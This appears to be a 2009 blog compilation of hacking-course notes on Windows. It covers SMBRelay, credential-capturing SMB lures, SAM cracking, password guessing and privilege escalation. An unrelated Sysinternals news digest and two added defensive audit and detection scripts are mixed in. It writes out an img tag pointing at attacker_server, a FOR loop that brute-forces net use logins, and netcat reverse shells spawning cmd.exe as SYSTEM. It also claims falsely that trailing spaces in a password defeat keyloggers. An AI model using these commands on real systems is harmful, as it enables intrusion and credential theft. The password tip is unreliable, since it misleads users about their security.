SMBRelay by Sir Dystic of the Cult of the Dead Cow is essentially a SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.

SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

The usage is smbrelay [options]

Options:

  • /D num - Set debug level; current valid levels: 0 (none), 1, 2. Defaults to 0.

  • /E - Enumerates interfaces and their indexes.

  • /F[-] - Fake server only: capture password hashes and do not relay. Use - to disable acting as a fake server if relay fails.

  • /IL num - Set the interface index to use when adding local IP addresses.

  • /IR num - Set the interface index to use when adding relay IP addresses. Defaults to 1.

  • /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC. Defaults to the primary host IP.

  • /R[-] IP - Set the starting relay IP address to use. Use - to not add each relay IP address to the NIC. Defaults to 192.1.1.1 first.

  • /S name - Set the source machine name.

The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The server can then capture both LM and NTLM hashes and write them to its working directory as hashes.txt, which can later be imported into L0phtCrack. Furthermore, the attacker's system can now access the client machine by simply connecting to it via the relay address: c:\>net use * \\192.x.x.x\c$

On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

---Regards,
Amarjit Singh

Redirecting SMB Logon to the Attacker

Redirecting SMB Logon to the Attacker
  • Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.

  • Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

  • When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be done directly off the network using tools such as L0phtCrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the L0phtCrack cracking engine.

As an example, the following tag, embedded in an HTML e-mail, shows nothing in the message, but when the null GIF is loaded by the victim's Internet Explorer, the victim automatically initiates an SMB session with attacker_server:

<img src="file://attacker_server/null.gif" height="1" width="1">

SMBCapture will be listening on attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

Countermeasures include:

  • Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;

  • Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;

  • Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to the SMBCapture attack; SMBCapture will report that it is capturing but, when sent to L0phtCrack, the hashes will not crack within a reasonable time frame.
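Both the SMB signing countermeasure from the SMBRelay post above and the LAN Manager Authentication Level in the list just above are backed by registry values, which is the quickest way to audit a fleet of hosts. The script below is an added example and not from any tool on this page; the registry paths and value names are the documented Windows ones, while the WEAK and HARDENED configurations are constructed and the live reader only works on Windows.

```python
"""Audit the registry values behind two countermeasures discussed above:
require SMB signing (against SMBRelay) and LAN Manager Authentication Level
(against SMBCapture). Added example; sample configurations are constructed."""

# Registry locations (under HKLM) behind the Security Options settings discussed.
SETTINGS = {
    "server_require_signing": (r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
                               "RequireSecuritySignature"),
    "client_require_signing": (r"SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters",
                               "RequireSecuritySignature"),
    "lm_compat_level": (r"SYSTEM\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel"),
}

# "LAN Manager Authentication Level" values; 2 is "Send NTLM responses only" from the list above.
LM_LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only, refuse LM",
    5: "Send NTLMv2 response only, refuse LM & NTLM",
}
NTLM_ONLY = 2


def audit(config):
    """Return one finding per weakness that the attacks described above rely on."""
    findings = []
    if config.get("server_require_signing", 0) != 1:
        findings.append("server accepts unsigned SMB sessions: a client authentication "
                        "relayed by an SMBRelay-style MITM cannot be told from the real client")
    if config.get("client_require_signing", 0) != 1:
        findings.append("client accepts unsigned SMB sessions: it will complete "
                        "authentication to a rogue server that does not sign")
    level = config.get("lm_compat_level", 0)
    if level < NTLM_ONLY:
        findings.append("LmCompatibilityLevel %d (%s): the LM response is sent and "
                        "can be captured and cracked" % (level, LM_LEVELS[level]))
    return findings


def read_live_config():
    """Read the live values on a Windows host (winreg exists only on Windows).
    A missing value is reported as 0, the NT/2000 default for all three."""
    import winreg
    config = {}
    for key, (path, value_name) in SETTINGS.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as handle:
                config[key] = int(winreg.QueryValueEx(handle, value_name)[0])
        except OSError:
            config[key] = 0
    return config


# Constructed configurations: the defaults the posts warn about, and the corrected values.
WEAK = {"server_require_signing": 0, "client_require_signing": 0, "lm_compat_level": 0}
HARDENED = {"server_require_signing": 1, "client_require_signing": 1, "lm_compat_level": NTLM_ONLY}

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(cfg) or ["no findings"])
```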

---Regards,
Amarjit Singh

Monday, April 20, 2009

Cracking NT/2000 passwords

  • SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located at %systemroot%\system32\config directory [open this link using RUN]

  • The file is locked when the OS is running.

    • Booting to an alternate OS

    • Backup SAM from the Repair directory

      • Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam

    • Extract the hashes from the SAM

      • Use L0phtCrack to crack the password hashes.

This file is usually locked when the system is in use. However, once the system is not used by any system components, it is world readable by default. Attackers are particularly vigilant to detect any possible SAM.SAV files which could be readable, as these can be used for obtaining password info.

There are tools such as NTFSDOS that are capable of mounting any NTFS partition as a logical drive. NTFSDOS.EXE is a read-only network file system driver for DOS/Windows that is able to recognize and mount NTFS drives for transparent access. It makes NTFS drives appear indistinguishable from standard FAT drives, providing the ability to navigate, view and execute programs on them from DOS or from Windows.

Not all is lost if the system is in use and the SAM file is locked. If a system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck, because during the installation of NT/2000 a copy of the password database is put in \WINNT\REPAIR.

What happens if the system administrator has updated their repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities for dumping the password hashes out, like pwdump, or even run L0phtCrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

---Regards,
Amarjit Singh

The Windows Sysinternals

The Sysinternals web site was created in 1996 by Mark Russinovich and Bryce Cogswell to host their advanced system utilities and technical information. Microsoft acquired Sysinternals in July, 2006. Whether you’re an IT Pro or a developer, you’ll find Sysinternals utilities to help you manage, troubleshoot and diagnose your Windows systems and applications. If you have a question about a tool or how to use them, please visit the Sysinternals Forum for answers and help from other users and our moderators.

Sysinternals Live

Sysinternals Live is a service that enables you to execute Sysinternals tools directly from the Web without hunting for and manually downloading them. Simply enter a tool's Sysinternals Live path into Windows Explorer or a command prompt as http://live.sysinternals.com/ or \\live.sysinternals.com\tools\.


What's New (April 8, 2009)

Sysinternals wishes Channel 9 a Happy Birthday!
Channel 9, Microsoft's direct connection to developers, turned five a few days ago. Mark frequently gives interviews on Channel 9, including his latest on Windows 7 kernel changes, which is Channel 9's most viewed interview of all time at 550,000 views. Mark was one of the Niners to give Channel 9 a special birthday wish.

What's New (March 30, 2009)

Mark’s Blog: Pushing the Limits of Windows: Paged and Nonpaged Pool 
Check out Mark’s latest entry in his Pushing the Limits of Windows series, where he describes the role of the kernel’s paged and nonpaged pool resources, their limits, how the system behaves when they run out, and how to track down a driver that’s leaking pool.
Autoruns v9.40
This Autoruns update shows manual start Windows services, fixes a bug that affected the display of autostart locations that could include multiple startup registrations, and fixes a bug in the Jump To functionality on 64-bit Windows.

What's New (March 17, 2009)

Process Monitor v2.04
This update shows file mapping operations in basic mode, adds more translations of error numbers to text, fixes a bug that limited support for boot log files larger than 4GB, and displays version numbers using the same formatting as Windows.
TCPView v2.54
Version 2.54 fixes bugs that prevented the display of IPv6 TCP endpoints and the correct display of IPv6 UDP endpoints.
VMMap v1.02
VMMap now shows all image subsections, even if they reside within the same allocation region. It also fixes a bug in image name sorting and makes the UAC elevation smoother on 64-bit Windows.

What's New (March 2, 2009)

Sigcheck v1.6
This update adds checking for .NET strong signatures and extends the output of the -i option, which shows the image signers, to also print the path of the catalog that stores a file's signature.

What's New (February 23, 2009)

Vmmap v1.0
Vmmap is a new utility for analyzing process address spaces and working sets. Aimed primarily at developers, its detailed graphical and textual breakdown of exactly what types of memory contribute to a process's memory footprint make it a powerful performance analysis and tuning tool.
Mark to Speak at TechEd 2009
Come see the 2009 version of Mark's popular "Case of the Unexplained" session, where he demonstrates the use of Sysinternals tools with real-world troubleshooting examples. Mark's Windows 7 and Windows Server 2008 R2 session expands on his Channel 9 interview to dive deep on system-level enhancements and improvements, and his Inside Windows Server 2008 R2 Virtualization and VHD Enhancements session takes you on a tour of new features like Live Migration, Second Level Address Translation, and native VHD support.

What's New (February 4, 2009)

Mark’s Blog: The Case of the Phantom Desktop Files
Follow Mark’s latest investigation as he walks you through how he solved a problem ticket submitted by his wife for a perplexing issue she ran into on the kitchen computer.

Windows 7: To the Beta and Beyond
Join Mark Russinovich and a panel of MVPs and industry IT pros for a live discussion about Windows 7, its features and how it’s shaping up to be the best Windows yet.

What's New (January 12, 2009)

ZoomIt 3.0
This major update to ZoomIt, the Sysinternals screen magnification and annotation utility, adds a LiveZoom mode on Windows Vista and higher, allows you to change the typing and break timer font, adds the ability to copy the magnified screen to the clipboard with Ctrl+C, and introduces a new configuration interface.

What's New (January 6, 2009)

Mark's Blog: The Case of the Crashed Phone Call
Check out Mark's latest blog post to see how David Solomon, Mark's coauthor for the Windows Internals books, resolved a blue screen problem most likely related to an outdated driver.

---Regards,
Amarjit Singh

Password Types

Passwords can be categorized into various types based on their composition. Let us take a look at these types to enhance our understanding of password cracking.

  • Passwords that contain only letters: As the name implies, these contain just letters and are the easiest to crack. Example: "secret"

  • Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"

  • Passwords that contain only special characters: These passwords consist of only special characters. They are easy to crack, and the shorter they are, the easier. Example: "*%$%@"

  • Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Example: "a3rf5"

  • Passwords that contain only letters and special characters and passwords that contain only special characters and numbers are quite similar to the preceding one. Examples: "df%g$i", "39*&4"

  • Passwords that contain letters, special characters and numbers are considered to be the most secure as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and if encrypted well, safe on the network as well. Example: "a#d5y8%"

************************************************************************
NOTE: Well friends, it is nowhere documented that the most secure password contains [SPACES]. Using spaces in your password, it will become the strongest. Using spaces, you can easily bypass trojans & keyloggers (almost 100%). I recommend using 3-4 spaces as a prefix of your password. For e.g. suppose your password is: "iamsweet123" without quotes

Instead of this password, use "iamsweet123   ". Now what is the difference? Have a closer look. In the latter one you will see that it is exactly "iamsweet123[space][space][space]"

************************************************************************ 

---Regards,
Amarjit Singh

Automatic Password Cracking Algorithm

  1. Find a valid user

  2. Find the encryption algorithm used

  3. Obtain the encrypted passwords

  4. Create a list of possible passwords

  5. Encrypt each word

  6. See if there is a match for each user ID

  7. Repeat steps 1 through 6

However, the vulnerability does not arise from the hashing process but from the storage. Most systems do not "decrypt" the stored password during authentication, but store a one-way hash. During the login process, the password entered is run through the algorithm, generating a one-way hash that is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all that an attacker has to do in order to crack a password is to get a copy of the one-way hash stored on the server, and then use the algorithm to generate his own hashes until he gets a match. Most systems (Microsoft, UNIX, and NetWare) have published their hashing algorithms.

Attackers can use a combination of attack methods to reduce the time involved in cracking a password. This is where automated password crackers come into action. There are freeware password crackers available on the Internet for NT, NetWare, and UNIX. There are also password lists that can be fed to these crackers to carry out a dictionary attack.

---Regards,
Amarjit Singh

Manual Password Cracking Algorithm

  • Find a valid user

  • Create a list of possible passwords

  • Rank the passwords from high probability to low

  • Key in each password

  • If the system allows you in - Success

  • Else try till success

In its simplest form, password cracking can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated using the FOR loop.

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

[file: credentials.txt]
administrator ""
administrator password
administrator administrator
[Etc.]

From a directory that can access the text file the following command is typed:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
More? 2>>nul^
More? && echo %time% %date% >> outfile.txt^
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
c:\>type outfile.txt

If there has been a successfully guessed username and password from credentials.txt, outfile.txt will exist and contain the correct user name and password. The attacker's system will also have an open session with the victim server.
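Every line of credentials.txt that the loop tries produces a failed network logon in the target's Security log, followed by a success when a pair matches, so the server side has a clear signal to alert on. The detector below is an added example, not part of the original post; it assumes the NT/2000 event IDs (529 logon failure, 528 successful logon, logon type 3 for network logons) and runs over constructed records in a simplified CSV export.

```python
"""Detect the IPC$ password-guessing loop above in exported Security log records.
Added example (not from the page). Assumes NT/2000 event IDs: 529 = logon failure
(unknown user name or bad password), 528 = successful logon; network logons are type 3.
The records below are constructed, in the simplified CSV form this script expects."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

EVENT_LOGON_FAILURE = 529
EVENT_LOGON_SUCCESS = 528
NETWORK_LOGON = 3

# time, event id, user name, logon type, workstation the request came from
SAMPLE_LOG = """\
2009-04-20 10:15:01,529,administrator,3,ATTACKER-PC
2009-04-20 10:15:01,529,administrator,3,ATTACKER-PC
2009-04-20 10:15:02,529,administrator,3,ATTACKER-PC
2009-04-20 10:15:02,529,administrator,3,ATTACKER-PC
2009-04-20 10:15:03,529,administrator,3,ATTACKER-PC
2009-04-20 10:15:03,528,administrator,3,ATTACKER-PC
2009-04-20 10:20:00,529,jsmith,3,HR-DESKTOP
2009-04-20 10:20:07,528,jsmith,3,HR-DESKTOP
"""


def parse_records(text):
    """Turn the CSV export into dicts, oldest record first."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, logon_type, workstation = line.split(",")
        records.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                        "event_id": int(event_id), "user": user,
                        "logon_type": int(logon_type), "workstation": workstation})
    return records


def detect_guessing(records, window=timedelta(minutes=5), threshold=5, min_failures=3):
    """Return (alert, workstation, user, time) tuples:
    - "burst": `threshold` network logon failures from one workstation within `window`
      (the FOR loop produces one 529 per line of credentials.txt);
    - "success_after_failures": a network logon succeeded from a workstation that had
      at least `min_failures` failures inside the window (the loop found a valid pair,
      and outfile.txt on the attacker's side now holds it)."""
    recent = defaultdict(deque)           # workstation -> failure times still inside the window
    alerts = []
    for rec in records:
        if rec["logon_type"] != NETWORK_LOGON:
            continue
        failures = recent[rec["workstation"]]
        while failures and rec["time"] - failures[0] > window:
            failures.popleft()
        if rec["event_id"] == EVENT_LOGON_FAILURE:
            failures.append(rec["time"])
            if len(failures) == threshold:   # fire once, when the threshold is crossed
                alerts.append(("burst", rec["workstation"], rec["user"], rec["time"]))
        elif rec["event_id"] == EVENT_LOGON_SUCCESS and len(failures) >= min_failures:
            alerts.append(("success_after_failures", rec["workstation"], rec["user"], rec["time"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(parse_records(SAMPLE_LOG)):
        print("%s: %s as %s at %s" % alert)
```

The single mistyped password from HR-DESKTOP stays below both thresholds, which is the noise a real log is full of.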

---Regards,
Amarjit Singh

Access to the network using non-admin user account

Privilege Escalation
  • If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

  • This is called privilege escalation

Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the account in use to one with higher privileges, such as that of an administrator. For example, if the attacker has access to a W2K SP1 server, he can run a tool such as ERunAs2X.exe to escalate his privileges to those of SYSTEM by using "nc.exe -l -p 50000 -d -e cmd.exe". Note that this can also be used remotely.

For instance, the named pipe prediction flaw in Windows 2000 allows interactively logged-on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next named pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs with high privileges (such as ClipBook, which runs as SYSTEM), the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrators group. The attacker can conclude his privilege escalation by logging out and then logging in again.

Countermeasure: General privilege escalation countermeasures include restricting interactive logons and access to system programs that users do not require, such as cmd.exe, and auditing account logon events (success, failure), privilege use (success, failure) and system events (success, failure).
 
Tool: GetAdmin
  • GetAdmin.exe is a small program that adds a user to the local administrators group.

  • It uses a low-level NT kernel routine to set a global flag allowing access to any running process.

  • You need to logon to the server console to execute the program.

  • The GetAdmin.exe is run from the command line or from a browser.

  • This only works with NT 4.0 Service Pack 3.

On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.

Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.

Tool: hk.exe

The hk.exe utility exposes a Local Procedure Call flaw in NT.

  • A non-admin user can be escalated to administrators group using hk.exe

    C:\>net localgroup administrators peter /add
    Access Denied
    ------------------------------------------------
    c:\>hk net localgroup administrators peter /add
    lsass pid & tid are: 47 -48
    NtImpersonateClientOfPort succeeded

hk.exe takes advantage of the vulnerability in the API call to NT_Impersonate and allows the user to get the token of a kernel thread (LSASS or equivalent). The tool is a command line executable, and the user needs to just key in hk followed by any command he would want to run if he had NT Authority/System level privileges. Note that this is above the Administrator account privileges.

nc -l -p 23
nc -d -e cmd.exe 192.168.xx.xx 23 (done on the active netcat running on the webserver)
hk2 nc -d -e cmd.exe 192.168.xx.xx 23
lsass pid & tid are: 50 - 53

The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.

---Regards,
Amarjit Singh